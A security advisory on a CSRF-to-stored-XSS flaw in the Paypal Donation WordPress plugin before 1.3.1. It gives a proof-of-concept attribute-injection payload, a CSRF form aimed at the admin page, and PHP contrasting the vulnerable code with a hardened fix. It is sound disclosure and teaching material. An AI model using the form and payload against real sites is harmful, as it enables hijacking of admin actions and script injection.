WordPress Plugin Vulnerabilities

Paypal Donation < 1.3.1 - CSRF to Stored Cross-Site Scripting

Description

The plugin offers a function to create donation buttons, which internally are posts. The process to create a new button lacks a CSRF (nonce) check, so an attacker could use it to make an authenticated admin create a new button. Furthermore, one of the Button fields is not escaped before being output inside an HTML attribute when editing a Button, leading to a Stored Cross-Site Scripting issue as well.

Proof of Concept

Create/Edit a Button and put the following payload in the Amount Menu Name field (wpedon_button_scpriceprice parameter): " autofocus=autofocus onfocus=alert(/XSS/) e=

Via CSRF:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=wpedon_buttons&action=new" method="POST">
      <input type="hidden" name="wpedon_button_name" value="Test" />
      <input type="hidden" name="wpedon_button_price" value="" />
      <input type="hidden" name="wpedon_button_scpriceprice" value='" autofocus=autofocus onfocus=alert(/XSS/) e=' />
      <input type="hidden" name="update" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The name, price and id params are not required for the attack, but they are displayed on the buttons overview and can be used to attract the victim's attention so that they edit the Button.

The XSS triggers when the affected Button is edited.
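To make the two defects concrete, the schematic below shows the vulnerable pattern the description implies (no nonce check on the create handler, stored value echoed raw into a value="..." attribute) next to a hardened version. This is an added illustration, not the plugin's own code: the function names, the post type wpedon_demo_button, the meta key scpriceprice, the nonce action/field names and the manage_options capability check are all assumptions; only the form parameter names come from the advisory.

```php
<?php
// Added example, not the Paypal Donation plugin's code. Names marked "hypothetical"
// are assumptions; only wpedon_button_name / wpedon_button_price /
// wpedon_button_scpriceprice / update come from the advisory above.

// --- Vulnerable pattern (schematic) ---------------------------------------

function wpedon_demo_save_button_vulnerable() {           // hypothetical
    if ( ! isset( $_POST['update'] ) ) {
        return;
    }
    // No check_admin_referer(): a cross-origin form POSTed by a logged-in admin
    // is accepted, which is the CSRF half of the issue.
    $button_id = wp_insert_post( array(
        'post_type'   => 'wpedon_demo_button',                       // hypothetical
        'post_title'  => $_POST['wpedon_button_name'] ?? '',
        'post_status' => 'publish',
    ) );
    update_post_meta( $button_id, 'scpriceprice', $_POST['wpedon_button_scpriceprice'] ?? '' ); // key hypothetical
}

function wpedon_demo_render_edit_field_vulnerable( $button_id ) { // hypothetical
    $value = get_post_meta( $button_id, 'scpriceprice', true );
    // Stored value goes unescaped into a double-quoted attribute. With the
    // advisory's payload this renders as
    //   value="" autofocus=autofocus onfocus=alert(/XSS/) e=""
    // so the attacker controls new attributes on the element (stored XSS).
    echo '<input type="text" name="wpedon_button_scpriceprice" value="' . $value . '">';
}

// --- Hardened pattern -----------------------------------------------------

function wpedon_demo_render_form_fixed( $button_id ) {      // hypothetical
    $value = get_post_meta( $button_id, 'scpriceprice', true );
    echo '<form method="post" action="'
        . esc_url( admin_url( 'admin.php?page=wpedon_buttons&action=new' ) ) . '">';
    // Emits a hidden nonce field bound to this action and the current user,
    // plus a hidden _wp_http_referer field.
    wp_nonce_field( 'wpedon_demo_save_button', 'wpedon_demo_nonce' );   // hypothetical names
    // esc_attr() turns " into &quot; so the payload stays inside the attribute value.
    echo '<input type="text" name="wpedon_button_scpriceprice" value="' . esc_attr( $value ) . '">';
    echo '<input type="submit" name="update" value="Save">';
    echo '</form>';
}

function wpedon_demo_save_button_fixed() {                  // hypothetical
    if ( ! isset( $_POST['update'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {          // capability is an assumption
        wp_die( 'Insufficient privileges' );
    }
    // Dies unless wpedon_demo_nonce is a valid nonce for this action and user;
    // a third-party page cannot obtain it, which closes the CSRF vector.
    check_admin_referer( 'wpedon_demo_save_button', 'wpedon_demo_nonce' );

    $name      = sanitize_text_field( wp_unslash( $_POST['wpedon_button_name'] ?? '' ) );
    $menu_name = sanitize_text_field( wp_unslash( $_POST['wpedon_button_scpriceprice'] ?? '' ) );
    $price     = floatval( wp_unslash( $_POST['wpedon_button_price'] ?? '0' ) );

    $button_id = wp_insert_post( array(
        'post_type'   => 'wpedon_demo_button',                       // hypothetical
        'post_title'  => $name,
        'post_status' => 'publish',
    ) );
    update_post_meta( $button_id, 'scpriceprice', $menu_name );    // key hypothetical
    update_post_meta( $button_id, 'price', $price );               // key hypothetical
}
```

Note that input sanitisation alone would not have fixed the XSS: sanitize_text_field() strips tags and control characters but keeps double quotes, so the advisory's payload (which contains no angle brackets) survives it intact. The attribute must be escaped at output time with esc_attr(); the nonce check is what removes the CSRF vector.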

Affects Plugins

Fixed in 1.3.1

Miscellaneous

Original Researcher
dc11
Submitter
dc11
Verified
Yes

Timeline

Publicly Published
2021-10-04
Added
2021-10-04
Last Updated
2022-04-15
